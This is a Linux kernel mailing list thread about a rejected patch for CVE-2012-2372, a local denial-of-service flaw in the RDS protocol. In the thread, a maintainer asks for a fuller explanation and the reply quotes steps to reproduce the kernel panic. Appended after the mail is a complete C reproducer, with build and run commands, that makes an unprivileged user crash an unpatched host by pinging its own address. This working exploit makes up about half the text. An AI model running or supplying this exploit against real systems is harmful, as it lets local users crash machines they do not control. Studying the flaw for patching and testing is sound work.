Re: [PATCH] rds: fix local ping DoS

From: Josh Hunt
Date: Thu Nov 14 2013 - 08:45:51 EST


On 11/14/2013 01:03 AM, David Miller wrote:
From: Josh Hunt <johunt@xxxxxxxxxx>
Date: Wed, 13 Nov 2013 17:15:43 -0800

The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram Sockets
(RDS) protocol implementation allows local users to cause a denial of service
(BUG_ON and kernel panic) by establishing an RDS connection with the source
IP address equal to the IPoIB interface's own IP address, as demonstrated by
rds-ping.

A local unprivileged user could use this flaw to crash the system.

CVE-2012-2372

Reported-by: Honggang Li <honli@xxxxxxxxxx>
Signed-off-by: Josh Hunt <johunt@xxxxxxxxxx>

I'm sorry I can't apply this. This commit message needs to be much
less terse and explain things more.

First of all, why is the "off % RDS_FRAG_SIZE" important?

And, even more importantly, why is it OK to avoid this assertion just
because we're going over loopback?

Furthermore, why doesn't net/rds/iw_send.c:rds_iw_xmit() have the same
exact problem? It makes the same exact assertion check.

I know this RDS code is a steaming pile of poo, but that doesn't mean
we just randomly adjust assertions to make crashes go away without
sufficient understanding of exactly what's going on.

Thanks.


Sure, understandable questions. Unfortunately I don't have the hardware to properly debug and analyze this. I was just trying to get this through on the assumption that the previous attempts just failed due to incorrect submission procedures and lack of a reproducible testcase. If nothing else, this whole thing brought out the testcase :)

Testcase from Honggang's earlier mail:
<snip>
The test case is very simple:
Steps to Reproduce:
1. yum install -y rds-tools

2. [root@rdma3 ~]# ifconfig ib0 | grep 'inet addr'
inet addr:172.31.0.3 Bcast:172.31.0.255 Mask:255.255.255.0

3. [root@rdma3 ~]# /usr/bin/rds-ping 172.31.0.3 <<<< kernel panic (You
may need to wait for a few seconds before the kernel panic.)

This bug can be reproduced with Mellanox HCAs (mlx4_ib.ko and mthca.ko),
QLogic HCA (ib_qib.ko). I did not test the QLogic HCA running "ib_ipath.ko".
</snip>

Perhaps Venkat or someone else with the hardware mentioned can provide a better explanation and better solution to the crash.

Josh
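For readers who want the testcase above without installing rds-tools, here is an added reproducer written for this page (it is not code from the thread, from rds-tools or from the kernel) that mirrors what rds-ping does at the socket level: open a PF_RDS socket, bind it to the IPoIB address, send a zero-length datagram to port 0 of the destination and wait for the pong. The socket family, the SOCK_SEQPACKET type, AF_INET sockaddr_in addressing, port 0 as the ping port and the fallback value of AF_RDS are assumptions taken from rds-ping's behaviour, not from this mail. Pointing it at the interface's own address is exactly the trigger Honggang describes, so only run that on a disposable host; on a machine where the rds module is not loaded, socket() fails with EAFNOSUPPORT, which doubles as a quick exposure check.

```c
/* Added example, not rds-tools code: a minimal rds-ping stand-in. */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <unistd.h>

#ifndef AF_RDS
#define AF_RDS 21   /* assumption: PF_RDS value from linux/socket.h, for headers that lack it */
#endif

/* RDS endpoints are plain AF_INET sockaddr_in values (assumption mirrored from
 * rds-ping); port 0 is the reserved ping port that the kernel answers with a pong. */
static int rds_endpoint(const char *ip, uint16_t port, struct sockaddr_in *out)
{
    memset(out, 0, sizeof(*out));
    out->sin_family = AF_INET;
    out->sin_port = htons(port);
    return inet_pton(AF_INET, ip, &out->sin_addr) == 1 ? 0 : -1;
}

/* The condition from the report: the destination equals the address the socket
 * is bound to. 1 = self ping (crash case on unpatched kernels), 0 = not, -1 = bad input. */
static int targets_own_address(const char *local_ip, const char *dst_ip)
{
    struct sockaddr_in src, dst;

    if (rds_endpoint(local_ip, 0, &src) < 0 || rds_endpoint(dst_ip, 0, &dst) < 0)
        return -1;
    return src.sin_addr.s_addr == dst.sin_addr.s_addr;
}

/* One ping round. Returns 0 on a pong, -errno otherwise (-EAFNOSUPPORT when
 * the rds module is not present, -EAGAIN when no pong arrives in time). */
static int rds_ping_once(const char *local_ip, const char *dst_ip, int timeout_ms)
{
    struct sockaddr_in src, dst, from;
    struct timeval tv = { timeout_ms / 1000, (timeout_ms % 1000) * 1000 };
    struct msghdr msg;
    int fd, rc = 0;

    if (rds_endpoint(local_ip, 0, &src) < 0 || rds_endpoint(dst_ip, 0, &dst) < 0)
        return -EINVAL;

    fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (fd < 0)
        return -errno;

    /* Bind with port 0: the kernel picks a free source port for us. */
    if (bind(fd, (struct sockaddr *)&src, sizeof(src)) < 0 ||
        setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)) < 0) {
        rc = -errno;
        goto out;
    }

    /* A zero-length datagram to port 0 is the RDS ping. */
    memset(&msg, 0, sizeof(msg));
    msg.msg_name = &dst;
    msg.msg_namelen = sizeof(dst);
    if (sendmsg(fd, &msg, 0) < 0) {
        rc = -errno;
        goto out;
    }

    /* The pong comes back from port 0 of the destination. */
    memset(&msg, 0, sizeof(msg));
    msg.msg_name = &from;
    msg.msg_namelen = sizeof(from);
    if (recvmsg(fd, &msg, 0) < 0)
        rc = -errno;
out:
    close(fd);
    return rc;
}

int main(int argc, char **argv)
{
    int rc;

    if (argc != 3) {
        fprintf(stderr, "usage: %s <local-ib0-ip> <dst-ip>\n", argv[0]);
        return 2;
    }
    if (targets_own_address(argv[1], argv[2]) == 1)
        fprintf(stderr, "warning: self ping, panics unpatched kernels (CVE-2012-2372)\n");

    rc = rds_ping_once(argv[1], argv[2], 1000);
    if (rc == 0)
        printf("pong from %s\n", argv[2]);
    else
        printf("ping failed: %s\n", strerror(-rc));
    return rc == 0 ? 0 : 1;
}
```

Build with `cc -o rds-selfping rds-selfping.c` and run `./rds-selfping 172.31.0.3 172.31.0.3` (the addresses from Honggang's steps) as an ordinary user to confirm the unprivileged trigger. A "ping failed: Address family not supported by protocol" result means the kernel has no RDS support or the module is blacklisted, which is the state a hardened host should be in.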